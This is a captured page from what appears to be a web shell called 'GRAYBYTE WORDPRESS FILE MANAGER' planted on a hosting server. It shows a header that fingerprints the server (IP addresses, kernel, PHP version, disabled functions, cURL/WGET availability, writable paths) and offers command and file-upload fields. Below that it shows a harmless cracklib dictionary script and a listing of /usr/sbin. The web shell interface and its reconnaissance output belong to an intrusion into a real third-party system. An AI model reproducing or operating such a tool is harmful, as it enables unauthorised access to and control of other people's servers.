GRAYBYTE WORDPRESS FILE MANAGER7172

Server IP : 149.255.58.128 / Your IP : 216.73.216.88
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/sbin/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/sbin//create-cracklib-dict
#!/usr/bin/sh

usage() {
	cat <<-EOF
	Usage: create-cracklib-dict [options] wordlist ...
	
	This script takes one or more word list files as arguments
	and converts them into cracklib dictionaries for use
	by password checking programs. The results are placed in
	the default compiled-in dictionary location.
	
	If you wish to store the dictionary in a different location,
	use the cracklib-format and cracklib-packer commands directly.
	
	Options:
	  -o, --output <file>   Alternative output file for cracklib-packer
	  -h, --help            This help output
	
	Example:
	create-cracklib-dict /usr/share/words
	EOF
	if [ -n "$*" ] ; then
		echo 1>&2
		echo "Error: $*" 1>&2
		exit 1
	else
		exit 0
	fi
}

output=""
while [ -n "$1" ] ; do
	case $1 in
		-o|--output) output=$2; shift;;
		-h|--help)   usage;;
		--)          break;;
		-*)          usage "unknown option '$*'";;
		*)           break;;
	esac
	shift
done

[ -z "$*" ] && usage

exec cracklib-format "$@" | cracklib-packer ${output}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
April 06 2025 07:46:06
0 / root
0755
chroot
39.734 KB
October 02 2024 21:44:18
0 / root
0755
cloudlinux-selector
0.639 KB
April 10 2025 09:04:15
0 / root
0755
consoletype
15.297 KB
November 14 2024 17:04:06
0 / root
0755
cracklib-check
15.695 KB
January 29 2022 21:18:16
0 / root
0755
cracklib-format
0.249 KB
January 29 2022 21:18:10
0 / root
0755
cracklib-packer
15.695 KB
January 29 2022 21:18:16
0 / root
0755
cracklib-unpacker
15.688 KB
January 29 2022 21:18:16
0 / root
0755
create-cracklib-dict
0.971 KB
August 18 2015 18:41:16
0 / root
0755
ddns-confgen
27.43 KB
February 19 2025 16:04:24
0 / root
0755
exim
1.02 KB
March 21 2025 17:16:13
0 / root
0755
faillock
23.359 KB
November 25 2024 21:25:08
0 / root
0755
ip
755.992 KB
April 30 2024 20:24:25
0 / root
0755
ldconfig
1.12 MB
April 28 2025 16:08:23
0 / root
0755
mkhomedir_helper
23.375 KB
November 25 2024 21:25:08
0 / root
0755
named-checkzone
39.523 KB
February 19 2025 16:04:24
0 / root
0755
named-compilezone
39.523 KB
February 19 2025 16:04:24
0 / root
0755
named-nzd2nzf
15.289 KB
February 19 2025 16:04:24
0 / root
0755
nsec3hash
15.367 KB
February 19 2025 16:04:24
0 / root
0755
pam_console_apply
43.688 KB
November 25 2024 21:25:08
0 / root
0755
pam_namespace_helper
0.46 KB
November 25 2024 21:24:58
0 / root
0755
pam_timestamp_check
15.297 KB
November 25 2024 21:25:08
0 / root
0755
proxyexec
24.008 KB
December 09 2022 09:50:30
0 / root
0555
pwhistory_helper
19.367 KB
November 25 2024 21:25:08
0 / root
0755
sasldblistusers2
15.273 KB
April 10 2023 14:10:39
0 / root
0755
saslpasswd2
15.242 KB
April 10 2023 14:10:39
0 / root
0755
sendmail
1.027 KB
March 21 2025 17:16:13
0 / mailtrap
0755
snmpd
35.414 KB
October 02 2024 18:56:26
0 / root
0755
snmptrapd
35.523 KB
October 02 2024 18:56:26
0 / root
0755
tmpwatch
36.031 KB
February 11 2022 11:52:55
0 / root
0755
tsig-keygen
27.43 KB
February 19 2025 16:04:24
0 / root
0755
unix_chkpwd
23.453 KB
November 25 2024 21:25:08
0 / root
0755
unix_update
31.492 KB
November 25 2024 21:25:08
0 / root
0700

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF